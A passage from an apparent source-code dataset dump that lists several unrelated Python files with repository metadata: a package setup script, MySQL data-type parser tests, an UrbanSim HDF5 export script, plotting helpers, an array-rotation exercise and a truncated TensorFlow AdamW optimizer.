#
self.setProgressPercentage(100)
self.progressMessage(0, 100, self._displayName + " Complete")
### add the url text from the configuration section
fcst = fcst + "\n" + self._urlText
return fcst
| 40.384921
| 105
| 0.584455
| 9,120
| 0.896138
| 0
| 0
| 0
| 0
| 0
| 0
| 5,482
| 0.538666
|
552924a7e504599cbe9d1cfc08f6a123e6773a8c
| 880
|
py
|
Python
|
setup.py
|
hubmapconsortium/python-sdk
|
17eaec434f1f65190a6e53d0055fe382841222de
|
[
"MIT"
] | null | null | null |
setup.py
|
hubmapconsortium/python-sdk
|
17eaec434f1f65190a6e53d0055fe382841222de
|
[
"MIT"
] | 8
|
2021-11-09T13:35:48.000Z
|
2022-03-04T15:56:52.000Z
|
setup.py
|
hubmapconsortium/python-sdk
|
17eaec434f1f65190a6e53d0055fe382841222de
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="hubmap-sdk",
version="1.0.1",
author="Hubmap",
author_email="api-developers@hubmapconsortium.org",
description="Python Client Libary to use HuBMAP web services",
long_description=long_description,
long_description_content_type="text/markdown",
packages=['hubmap_sdk'],
keywords=[
"HuBMAP Sdk",
"python"
],
install_requires=[
"certifi==2021.10.8",
"chardet==4.0.0",
"idna==2.10",
"requests==2.25.1",
"urllib3==1.26.7"
],
include_package_data=True,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
],
python_requires='>=3.6'
)
| 25.142857
| 66
| 0.606818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 377
| 0.428409
|
5529bf458e89cd64db669da48d12a440dd5e7310
| 14,095
|
py
|
Python
|
tests/grammar/test_data_type.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 28
|
2016-02-13T10:20:21.000Z
|
2022-03-10T02:41:58.000Z
|
tests/grammar/test_data_type.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 22
|
2016-02-15T15:55:09.000Z
|
2017-09-12T13:49:17.000Z
|
tests/grammar/test_data_type.py
|
Daniihh/sqlpyparser
|
aad1d613c02d4f8fa6b833c060a683cf7e194b1c
|
[
"MIT"
] | 16
|
2016-02-15T16:41:23.000Z
|
2021-05-18T04:51:52.000Z
|
# -*- encoding:utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import pyparsing
from mysqlparse.grammar.data_type import data_type_syntax
class DataTypeSyntaxTest(unittest.TestCase):
def test_bit(self):
self.assertEquals(data_type_syntax.parseString("BIT").data_type, 'BIT')
self.assertEquals(data_type_syntax.parseString("BIT(8)").data_type, 'BIT')
self.assertEquals(data_type_syntax.parseString("BIT(8)").length[0], '8')
def test_integers(self):
type_list = ['TINYINT', 'SMALLINT', 'MEDIUMINT', 'INT', 'INTEGER', 'BIGINT']
type_plain = "{type_name}".format
type_with_length = "{type_name}(8)".format
type_with_unsigned = "{type_name}(8) unsigned".format
type_with_zerofill = "{type_name}(8) zerofill".format
type_with_all_modifiers = "{type_name}(8) UNSIGNED ZEROFILL".format
for type_name in type_list:
self.assertEquals(
data_type_syntax.parseString(type_plain(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_length(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_length(type_name=type_name)).length[0],
'8',
)
self.assertFalse(
data_type_syntax.parseString(type_with_length(type_name=type_name)).unsigned,
)
self.assertFalse(
data_type_syntax.parseString(type_with_length(type_name=type_name)).zerofill,
)
self.assertEquals(
data_type_syntax.parseString(type_with_unsigned(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_unsigned(type_name=type_name)).length[0],
'8',
)
self.assertTrue(
data_type_syntax.parseString(type_with_unsigned(type_name=type_name)).unsigned,
)
self.assertEquals(
data_type_syntax.parseString(type_with_zerofill(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_zerofill(type_name=type_name)).length[0],
'8',
)
self.assertTrue(
data_type_syntax.parseString(type_with_zerofill(type_name=type_name)).zerofill,
)
self.assertEquals(
data_type_syntax.parseString(type_with_all_modifiers(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_all_modifiers(type_name=type_name)).length[0],
'8',
)
self.assertTrue(
data_type_syntax.parseString(type_with_all_modifiers(type_name=type_name)).unsigned,
)
self.assertTrue(
data_type_syntax.parseString(type_with_all_modifiers(type_name=type_name)).zerofill,
)
def test_decimals(self):
type_list = ['REAL', 'DOUBLE', 'FLOAT', 'DECIMAL', 'NUMERIC']
for type_name in type_list:
self.assertEquals(
data_type_syntax.parseString("{type_name}".format(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString("{type_name}(10)".format(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString("{type_name}(10)".format(type_name=type_name)).length,
'10',
)
self.assertEquals(
data_type_syntax.parseString("{type_name}(10, 2)".format(type_name=type_name)).decimals,
'2',
)
self.assertFalse(
data_type_syntax.parseString("{type_name}(10, 2)".format(type_name=type_name)).unsigned,
)
self.assertFalse(
data_type_syntax.parseString("{type_name}(10, 2)".format(type_name=type_name)).zerofill,
)
self.assertTrue(
data_type_syntax.parseString("{type_name}(10, 2) UNSIGNED".format(type_name=type_name)).unsigned,
)
self.assertTrue(
data_type_syntax.parseString("{type_name}(10, 2) ZEROFILL".format(type_name=type_name)).zerofill,
)
self.assertTrue(
data_type_syntax.parseString("{type_name}(10, 2) UNSIGNED ZEROFILL".format(type_name=type_name)).unsigned,
)
self.assertTrue(
data_type_syntax.parseString("{type_name}(10, 2) UNSIGNED ZEROFILL".format(type_name=type_name)).zerofill,
)
def test_datetimes(self):
self.assertEquals(data_type_syntax.parseString("DATE").data_type, 'DATE')
self.assertEquals(data_type_syntax.parseString("YEAR").data_type, 'YEAR')
type_list = ['TIME', 'TIMESTAMP', 'DATETIME']
type_plain = "{type_name}".format
type_with_precision = "{type_name}(6)".format
for type_name in type_list:
self.assertEquals(
data_type_syntax.parseString(type_plain(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_precision(type_name=type_name)).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(type_with_precision(type_name=type_name)).precision[0],
'6',
)
def test_chars(self):
self.assertEquals(data_type_syntax.parseString("CHAR").data_type, 'CHAR')
self.assertEquals(data_type_syntax.parseString("CHAR(8)").length[0], '8')
self.assertEquals(data_type_syntax.parseString("CHAR(8) BINARY").length[0], '8')
self.assertEquals(data_type_syntax.parseString("CHAR(8) BINARY").binary, True)
self.assertEquals(data_type_syntax.parseString("CHAR(8) CHARACTER SET 'utf8'").character_set, "utf8")
self.assertEquals(data_type_syntax.parseString("CHAR(8) COLLATE 'utf8_general'").collation_name, "utf8_general")
self.assertEquals(
data_type_syntax.parseString(
"CHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).character_set,
"utf8"
)
self.assertEquals(
data_type_syntax.parseString(
"CHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).collation_name,
"utf8_general"
)
self.assertTrue(
data_type_syntax.parseString(
"CHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).binary,
)
def test_varchar(self):
with self.assertRaises(pyparsing.ParseException):
data_type_syntax.parseString("VARCHAR").data_type
self.assertEquals(data_type_syntax.parseString("VARCHAR(8)").length[0], '8')
self.assertEquals(data_type_syntax.parseString("VARCHAR(8) BINARY").length[0], '8')
self.assertEquals(data_type_syntax.parseString("VARCHAR(8) BINARY").binary, True)
self.assertEquals(data_type_syntax.parseString("VARCHAR(8) CHARACTER SET 'utf8'").character_set, "utf8")
self.assertEquals(
data_type_syntax.parseString("VARCHAR(8) COLLATE 'utf8_general'").collation_name,
"utf8_general",
)
self.assertEquals(
data_type_syntax.parseString(
"VARCHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).character_set,
"utf8"
)
self.assertEquals(
data_type_syntax.parseString(
"VARCHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).collation_name,
"utf8_general"
)
self.assertTrue(
data_type_syntax.parseString(
"VARCHAR(8) BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general'"
).binary,
)
def test_binary(self):
self.assertEquals(data_type_syntax.parseString("BINARY").data_type, 'BINARY')
self.assertEquals(data_type_syntax.parseString("BINARY(8)").data_type, 'BINARY')
self.assertEquals(data_type_syntax.parseString("BINARY(8)").length[0], '8')
def test_varbinary(self):
with self.assertRaises(pyparsing.ParseException):
data_type_syntax.parseString("VARBINARY").data_type
self.assertEquals(data_type_syntax.parseString("VARBINARY(8)").length[0], '8')
def test_blobs(self):
type_list = ['TINYBLOB', 'BLOB', 'MEDIUMBLOB', 'LONGBLOB']
for type_name in type_list:
self.assertEquals(data_type_syntax.parseString(type_name).data_type, type_name)
def test_texts(self):
type_list = ['TINYTEXT', 'TEXT', 'MEDIUMTEXT', 'LONGTEXT']
for type_name in type_list:
self.assertEquals(data_type_syntax.parseString(type_name).data_type, type_name)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} BINARY".format(type_name=type_name)
).data_type,
type_name,
)
self.assertTrue(
data_type_syntax.parseString(
"{type_name} BINARY".format(type_name=type_name)
).binary,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} CHARACTER SET 'utf8'".format(type_name=type_name)
).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} CHARACTER SET 'utf8'".format(type_name=type_name)
).character_set,
'utf8',
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} COLLATE 'utf8_general_ci'".format(type_name=type_name)
).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} COLLATE 'utf8_general_ci'".format(type_name=type_name)
).collation_name,
'utf8_general_ci',
)
self.assertFalse(
data_type_syntax.parseString(
"{type_name} COLLATE 'utf8_general_ci'".format(type_name=type_name)
).binary,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general_ci'".format(type_name=type_name)
).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general_ci'".format(type_name=type_name)
).character_set,
'utf8',
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name} BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general_ci'".format(type_name=type_name)
).collation_name,
'utf8_general_ci',
)
self.assertTrue(
data_type_syntax.parseString(
"{type_name} BINARY CHARACTER SET 'utf8' COLLATE 'utf8_general_ci'".format(type_name=type_name)
).binary,
)
def test_enumerables(self):
type_list = ['ENUM', 'SET']
for type_name in type_list:
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3')".format(type_name=type_name)
).data_type,
type_name,
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3')".format(type_name=type_name)
).value_list.asList(),
['option1', 'option2', 'option3'],
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3') CHARACTER SET 'utf8'".format(type_name=type_name)
).value_list.asList(),
['option1', 'option2', 'option3'],
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3') CHARACTER SET 'utf8'".format(type_name=type_name)
).character_set,
'utf8',
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3') CHARACTER SET 'utf8'".format(type_name=type_name)
).value_list.asList(),
['option1', 'option2', 'option3'],
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3') CHARACTER SET 'utf8'".format(type_name=type_name)
).character_set,
'utf8',
)
self.assertEquals(
data_type_syntax.parseString(
"{type_name}('option1', 'option2', 'option3') CHARACTER SET 'utf8' COLLATE 'utf8_general_ci'".format(
type_name=type_name
)
).collation_name,
'utf8_general_ci',
)
| 40.386819
| 122
| 0.57602
| 13,890
| 0.985456
| 0
| 0
| 0
| 0
| 0
| 0
| 2,574
| 0.182618
|
5529c5dbc7514236bc8611211cfb848e2618a841
| 2,615
|
py
|
Python
|
bayarea_urbansim/data_regeneration/export_to_h5.py
|
ual/DOE-repo-deliverable
|
4bafdd9a702a9a6466dd32ae62f440644d735d3c
|
[
"BSD-3-Clause"
] | null | null | null |
bayarea_urbansim/data_regeneration/export_to_h5.py
|
ual/DOE-repo-deliverable
|
4bafdd9a702a9a6466dd32ae62f440644d735d3c
|
[
"BSD-3-Clause"
] | null | null | null |
bayarea_urbansim/data_regeneration/export_to_h5.py
|
ual/DOE-repo-deliverable
|
4bafdd9a702a9a6466dd32ae62f440644d735d3c
|
[
"BSD-3-Clause"
] | null | null | null |
import pandas as pd
from spandex import TableLoader
import pandas.io.sql as sql
loader = TableLoader()
def db_to_df(query):
"""Executes SQL query and returns DataFrame."""
conn = loader.database._connection
return sql.read_frame(query, conn)
## Export to HDF5- get path to output file
h5_path = loader.get_path('out/regeneration/summaries/bayarea_v3.h5') ## Path to the output file
#Buildings
buildings = db_to_df('select * from building').set_index('building_id')
if 'id' in buildings.columns:
del buildings['id']
buildings['building_type_id'] = 0
buildings.building_type_id[buildings.development_type_id == 1] = 1
buildings.building_type_id[buildings.development_type_id == 2] = 3
buildings.building_type_id[buildings.development_type_id == 5] = 12
buildings.building_type_id[buildings.development_type_id == 7] = 10
buildings.building_type_id[buildings.development_type_id == 9] = 5
buildings.building_type_id[buildings.development_type_id == 10] = 4
buildings.building_type_id[buildings.development_type_id == 13] = 8
buildings.building_type_id[buildings.development_type_id == 14] = 7
buildings.building_type_id[buildings.development_type_id == 15] = 9
buildings.building_type_id[buildings.development_type_id == 13] = 8
buildings.building_type_id[buildings.development_type_id == 17] = 6
buildings.building_type_id[buildings.development_type_id == 24] = 16
#Parcels
parcels = db_to_df('select * from parcel').set_index('parcel_id')
parcels['shape_area'] = parcels.acres * 4046.86
if 'id' in parcels.columns:
del parcels['id']
if 'geom' in parcels.columns:
del parcels['geom']
if 'centroid' in parcels.columns:
del parcels['centroid']
#Jobs
jobs = db_to_df('select * from jobs').set_index('job_id')
if 'id' in jobs.columns:
del jobs['id']
#Households
hh = db_to_df('select * from households').set_index('household_id')
if 'id' in hh.columns:
del hh['id']
hh = hh.rename(columns = {'hinc':'income'})
for col in hh.columns:
hh[col] = hh[col].astype('int32')
#Zones
zones_path = loader.get_path('juris/reg/zones/zones.csv')
zones = pd.read_csv(zones_path).set_index('zone_id')
#Putting tables in the HDF5 file
store = pd.HDFStore(h5_path)
store['parcels'] = parcels # http://urbansim.org/Documentation/Parcel/ParcelTable
store['buildings'] = buildings # http://urbansim.org/Documentation/Parcel/BuildingsTable
store['households'] = hh # http://urbansim.org/Documentation/Parcel/HouseholdsTable
store['jobs'] = jobs # http://urbansim.org/Documentation/Parcel/JobsTable
store['zones'] = zones # http://urbansim.org/Documentation/Parcel/ZonesTable
store.close()
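# --- Optional read-back check (a hedged sketch; not part of the original script) ---
# Re-open the HDF5 file and report the row count of each exported table to
# confirm the export succeeded. Uses only the h5_path defined above.
readback = pd.HDFStore(h5_path)
for key in ['parcels', 'buildings', 'households', 'jobs', 'zones']:
    print('%s: %d rows' % (key, len(readback[key])))
readback.close()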
| 39.029851
| 97
| 0.757553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 838
| 0.320459
|
552b355ab9a4608d3f4dc4d7df2c3b24e79e210d
| 7,060
|
py
|
Python
|
minder_utils/visualisation/feature_engineering.py
|
alexcapstick/minder_utils
|
3bb9380b7796b5dd5b995ce1839ea6a94321021d
|
[
"MIT"
] | null | null | null |
minder_utils/visualisation/feature_engineering.py
|
alexcapstick/minder_utils
|
3bb9380b7796b5dd5b995ce1839ea6a94321021d
|
[
"MIT"
] | null | null | null |
minder_utils/visualisation/feature_engineering.py
|
alexcapstick/minder_utils
|
3bb9380b7796b5dd5b995ce1839ea6a94321021d
|
[
"MIT"
] | 1
|
2022-03-16T11:10:43.000Z
|
2022-03-16T11:10:43.000Z
|
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import seaborn as sns
import pandas as pd
from minder_utils.formatting.label import label_by_week, label_dataframe
from minder_utils.feature_engineering import Feature_engineer
from minder_utils.feature_engineering.calculation import *
from minder_utils.util import formatting_plots
from minder_utils.formatting import Formatting
fe = Feature_engineer(Formatting())
sns.set()
att = 'bathroom_night'
figure_title = {
'bathroom_night': 'Bathroom activity during the night',
'bathroom_daytime': 'Bathroom activity during the day',
}
patient_id = ''
def process_dataframe(df, week_shift=0):
df = df[df.id == patient_id]
map_dict = {i: j - week_shift for j, i in enumerate(df.week.sort_values().unique())}
df.week = df.week.map(map_dict)
return df
def visualise_flags(df):
for v in [True, False]:
data = df[df.valid == v]
not_labelled = True
for week in data.week.unique():
if v is True:
plt.axvline(week, 0, 0.17, color='red', label='UTI' if not_labelled else None)
not_labelled = False
elif v is False:
plt.axvline(week, 0, 0.17, color='blue', label='not UTI' if not_labelled else None)
not_labelled = False
@formatting_plots(figure_title[att])
def visualise_weekly_data(df):
df = process_dataframe(df)
sns.violinplot(data=df, x='week', y='value')
visualise_flags(df)
return df
@formatting_plots('P value, ' + figure_title[att])
def visualise_weekly_statistical_analysis(df, results):
df = process_dataframe(df, 1)
visualise_flags(df)
data = results[patient_id]
df = {'week': [], 'p_value': []}
for idx, sta in enumerate(data):
df['week'].append(idx + 1)
df['p_value'].append(sta[1])
sns.lineplot(df['week'], df['p_value'])
@formatting_plots('Body temperature')
def visualise_body_temperature(df):
df = process_dataframe(df)
visualise_flags(df)
sns.lineplot(df.week, df.value)
def visualise_data_time_lineplot(time_array, values_array, name, fill_either_side_array=None, fig = None, ax = None):
'''
    This function accepts a ``time_array`` and a ``values_array`` and plots the
    values against time, optionally shading +/- ``fill_either_side_array``
    around the line.
'''
if ax is None:
fig, ax = plt.subplots(1,1,figsize = (10,6))
ax.plot(time_array, values_array)
if not fill_either_side_array is None:
ax.fill_between(time_array,
y1=values_array-fill_either_side_array,
y2=values_array+fill_either_side_array,
alpha = 0.3)
return fig, ax
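# A minimal usage sketch (added; the data below are synthetic and purely
# illustrative, and nothing here runs on import): build a daily series and
# plot it with a +/- band using the helper above.
def _example_visualise_data_time_lineplot():
    import numpy as np
    times = pd.date_range('2021-01-01', periods=30, freq='D')
    values = np.random.RandomState(0).normal(size=30).cumsum()
    spread = np.full(30, 0.5)
    return visualise_data_time_lineplot(times, values, 'example metric',
                                        fill_either_side_array=spread)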
def visualise_data_time_heatmap(data_plot, name, fig = None, ax = None):
'''
This function accepts a dataframe in which the columns are the days and
the rows are the aggregated times of the day.
'''
if ax is None:
fig, axes = plt.subplots(1,1,figsize = (10,6))
ax = sns.heatmap(data_plot.values, cmap = 'Blues', cbar_kws={'label': name})
ax.invert_yaxis()
x_tick_loc = np.arange(0, data_plot.shape[1], 90)
ax.set_xticks(x_tick_loc + 0.5)
ax.set_xticklabels(data_plot.columns.astype(str)[x_tick_loc].values)
y_tick_loc = np.arange(0, data_plot.shape[0], 3)
ax.set_yticks(y_tick_loc + 0.5)
ax.set_yticklabels([pd.to_datetime(time).strftime("%H:%M") for time in data_plot.index.values[y_tick_loc]], rotation = 0)
ax.set_xlabel('Day')
ax.set_ylabel('Time of Day')
return fig, ax
def visualise_activity_daily_data(fe):
'''
Arguments
---------
- fe: class:
The feature engineering class that produces the data.
'''
activity_daily = fe.activity_specific_agg(agg='daily', load_smaller_aggs = True)
activity_daily = label_dataframe(activity_daily, days_either_side=0)
activity_daily=activity_daily.rename(columns = {'valid':'UTI Label'})
activity_daily['Feature'] = activity_daily['location'].map(fe.info)
sns.set_theme('talk')
fig_list = []
axes_list = []
for feature in activity_daily['location'].unique():
data_plot = activity_daily[activity_daily['location'].isin([feature])]
fig, ax = plt.subplots(1,1,figsize = (8,6))
ax = sns.boxplot(data=data_plot, x='value', y = 'Feature', hue='UTI Label', ax=ax, **{'showfliers':False})
ax.set_ylabel(None)
ax.set_yticks([])
ax.set_title('{}'.format(fe.info[feature]))
ax.set_xlabel('Value')
fig_list.append(fig)
axes_list.append(ax)
return fig_list, axes_list
def visualise_activity_weekly_data(fe):
'''
Arguments
---------
- fe: class:
The feature engineering class that produces the data.
'''
activity_weekly = fe.activity_specific_agg(agg='weekly', load_smaller_aggs = True)
activity_weekly = label_by_week(activity_weekly)
activity_weekly=activity_weekly.rename(columns = {'valid':'UTI Label'})
activity_weekly['Feature'] = activity_weekly['location'].map(fe.info)
sns.set_theme('talk')
fig_list = []
axes_list = []
for feature in activity_weekly['location'].unique():
data_plot = activity_weekly[activity_weekly['location'].isin([feature])]
fig, ax = plt.subplots(1,1,figsize = (8,6))
ax = sns.boxplot(data=data_plot, x='value', y = 'Feature', hue='UTI Label', ax=ax, **{'showfliers':False})
ax.set_ylabel(None)
ax.set_yticks([])
ax.set_title('{}'.format(fe.info[feature]))
ax.set_xlabel('Value')
fig_list.append(fig)
axes_list.append(ax)
return fig_list, axes_list
def visualise_activity_evently_data(fe):
'''
Arguments
---------
- fe: class:
The feature engineering class that produces the data.
'''
activity_evently = fe.activity_specific_agg(agg='evently', load_smaller_aggs = True)
activity_evently = label_dataframe(activity_evently, days_either_side=0)
activity_evently=activity_evently.rename(columns = {'valid':'UTI Label'})
activity_evently['Feature'] = activity_evently['location'].map(fe.info)
sns.set_theme('talk')
fig_list = []
axes_list = []
for feature in activity_evently['location'].unique():
data_plot = activity_evently[activity_evently['location'].isin([feature])]
fig, ax = plt.subplots(1,1,figsize = (8,6))
ax = sns.boxplot(data=data_plot, x='value', y = 'Feature', hue='UTI Label', ax=ax, **{'showfliers':False})
ax.set_ylabel(None)
ax.set_yticks([])
ax.set_title('{}'.format(fe.info[feature]))
ax.set_xlabel('Value')
fig_list.append(fig)
axes_list.append(ax)
return fig_list, axes_list
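# Usage sketch (hedged): each of the three visualise_activity_*_data helpers
# takes the module-level feature engineer `fe` defined above and returns lists
# of figures/axes, one boxplot per sensor location, e.g.
#   figs, axes = visualise_activity_daily_data(fe)
#   figs[0].savefig('daily_features.png')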
if __name__ == '__main__':
results = weekly_compare(getattr(fe, att), kolmogorov_smirnov)
df = label_by_week(getattr(fe, att))
visualise_weekly_data(df)
    visualise_weekly_statistical_analysis(df, results)
visualise_body_temperature(label_by_week(fe.body_temperature))
| 28.699187
| 125
| 0.657507
| 0
| 0
| 0
| 0
| 734
| 0.103966
| 0
| 0
| 1,264
| 0.179037
|
552c410668701cd1585658195d593e1b5751e350
| 442
|
py
|
Python
|
code-everyday-challenge/n159_cyclically_rotate.py
|
ved93/deliberate-practice-challenges
|
2fccdbb9d2baaa16f888055c081a8d04804c0045
|
[
"MIT"
] | null | null | null |
code-everyday-challenge/n159_cyclically_rotate.py
|
ved93/deliberate-practice-challenges
|
2fccdbb9d2baaa16f888055c081a8d04804c0045
|
[
"MIT"
] | null | null | null |
code-everyday-challenge/n159_cyclically_rotate.py
|
ved93/deliberate-practice-challenges
|
2fccdbb9d2baaa16f888055c081a8d04804c0045
|
[
"MIT"
] | null | null | null |
# https://practice.geeksforgeeks.org/problems/cyclically-rotate-an-array-by-one2614/1
# Given an array, rotate the array by one position in clock-wise direction.
# Input:
# N = 5
# A[] = {1, 2, 3, 4, 5}
# Output:
# 5 1 2 3 4
def rotate_cycle(a):
n = len(a)
tmp = a[-1]
for i in range(1,n):
a[-i] = a[-i-1]
a[0] = tmp
return a
if __name__ == "__main__":
a = [1, 2, 3,4,5]
print(rotate_cycle(a))
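# A hedged aside (not in the original solution): for plain Python lists the
# same clockwise rotation can be written with slicing, which returns a new
# list instead of mutating the input in place.
def rotate_cycle_slicing(a):
    return a[-1:] + a[:-1]
# e.g. rotate_cycle_slicing([1, 2, 3, 4, 5]) -> [5, 1, 2, 3, 4]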
| 17.68
| 85
| 0.567873
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 228
| 0.515837
|
552d7c8af23d30920337cc95fa4d7065705c0c5f
| 10,800
|
py
|
Python
|
adamw_optimizer.py
|
pwldj/Bio_XLNet_CRF
|
536053e9d74abdb2ee56000a8a779ffc1c0dd0fc
|
[
"Apache-2.0"
] | null | null | null |
adamw_optimizer.py
|
pwldj/Bio_XLNet_CRF
|
536053e9d74abdb2ee56000a8a779ffc1c0dd0fc
|
[
"Apache-2.0"
] | 2
|
2022-03-07T07:27:13.000Z
|
2022-03-07T07:27:15.000Z
|
adamw_optimizer.py
|
pwldj/MTL-BioNER
|
3fb336f517346daeec6a716fa6a657a421754bdb
|
[
"Apache-2.0"
] | 1
|
2021-05-05T08:42:53.000Z
|
2021-05-05T08:42:53.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adamw for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import tensorflow as tf
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import optimizer
class AdamOptimizer(optimizer.Optimizer):
def __init__(self,
learning_rate=0.001,
weight_decay_rate=0.0,
beta1=0.9,
beta2=0.999,
epsilon=1e-8,
exclude_from_weight_decay=None,
include_in_weight_decay=None,
use_locking=False,
name="Adamw"):
"""
        This is a multi-GPU version of AdamW.
:param learning_rate:
:param weight_decay_rate:
:param beta1:
:param beta2:
:param epsilon:
:param exclude_from_weight_decay:
:param include_in_weight_decay:
:param use_locking:
:param name:
"""
super(AdamOptimizer, self).__init__(use_locking, name)
self._lr = learning_rate
self._beta1 = beta1
self._beta2 = beta2
self._epsilon = epsilon
self._weight_decay_rate = weight_decay_rate
self._exclude_from_weight_decay = exclude_from_weight_decay
self._include_in_weight_decay = include_in_weight_decay
# Tensor versions of the constructor arguments, created in _prepare().
self._lr_t = None
self._weight_decay_rate_t = None
self._beta1_t = None
self._beta2_t = None
self._epsilon_t = None
def _get_beta_accumulators(self):
with ops.init_scope():
if context.executing_eagerly():
graph = None
else:
graph = ops.get_default_graph()
return (self._get_non_slot_variable("beta1_power", graph=graph),
self._get_non_slot_variable("beta2_power", graph=graph))
def _create_slots(self, var_list):
# Create the beta1 and beta2 accumulators on the same device as the first
# variable. Sort the var_list to make sure this device is consistent across
# workers (these need to go on the same PS, otherwise some updates are
# silently ignored).
first_var = min(var_list, key=lambda x: x.name)
self._create_non_slot_variable(
initial_value=self._beta1, name="beta1_power", colocate_with=first_var)
self._create_non_slot_variable(
initial_value=self._beta2, name="beta2_power", colocate_with=first_var)
# Create slots for the first and second moments.
for v in var_list:
self._zeros_slot(v, "adam_m", self._name)
self._zeros_slot(v, "adam_v", self._name)
def _prepare(self):
lr = self._call_if_callable(self._lr)
beta1 = self._call_if_callable(self._beta1)
beta2 = self._call_if_callable(self._beta2)
weight_decay_rate = self._call_if_callable(self._weight_decay_rate)
epsilon = self._call_if_callable(self._epsilon)
self._lr_t = ops.convert_to_tensor(lr, name="learning_rate")
self._beta1_t = ops.convert_to_tensor(beta1, name="beta1")
self._beta2_t = ops.convert_to_tensor(beta2, name="beta2")
self._weight_decay_rate_t = ops.convert_to_tensor(
weight_decay_rate, name="weight_decay_rate")
self._epsilon_t = ops.convert_to_tensor(epsilon, name="epsilon")
def _apply_dense(self, grad, var):
lr_t = math_ops.cast(self._lr_t, var.dtype.base_dtype)
beta1_t = math_ops.cast(self._beta1_t, var.dtype.base_dtype)
beta2_t = math_ops.cast(self._beta2_t, var.dtype.base_dtype)
weight_decay_rate = math_ops.cast(
self._weight_decay_rate_t, var.dtype.base_dtype)
epsilon_t = math_ops.cast(self._epsilon_t, var.dtype.base_dtype)
beta1_power, beta2_power = self._get_beta_accumulators()
beta1_power = math_ops.cast(beta1_power, var.dtype.base_dtype)
beta2_power = math_ops.cast(beta2_power, var.dtype.base_dtype)
lr = (lr_t * math_ops.sqrt(1 - beta2_power) / (1 - beta1_power))
m = self.get_slot(var, "adam_m")
v = self.get_slot(var, "adam_v")
m_t = (tf.multiply(beta1_t, m) + tf.multiply(1.0 - beta1_t, grad))
m_t = m.assign(m_t, use_locking=self._use_locking)
v_t = (tf.multiply(beta2_t, v) + tf.multiply(1.0 - beta2_t, tf.square(grad)))
v_t = v.assign(v_t, use_locking=self._use_locking)
m_t_hat = m_t / (1. - beta1_power)
v_t_hat = v_t / (1. - beta2_power)
update = m_t_hat / (tf.sqrt(v_t_hat) + epsilon_t)
if self._do_use_weight_decay(var.name):
update += weight_decay_rate * var
var_update = var - lr * update
var_update = var.assign(var_update, use_locking=self._use_locking)
return tf.group(*[var_update, m_t, v_t])
def _resource_apply_dense(self, grad, var):
lr_t = math_ops.cast(self._lr_t, var.dtype.base_dtype)
beta1_t = math_ops.cast(self._beta1_t, var.dtype.base_dtype)
beta2_t = math_ops.cast(self._beta2_t, var.dtype.base_dtype)
weight_decay_rate = math_ops.cast(
self._weight_decay_rate_t, var.dtype.base_dtype)
epsilon_t = math_ops.cast(self._epsilon_t, var.dtype.base_dtype)
beta1_power, beta2_power = self._get_beta_accumulators()
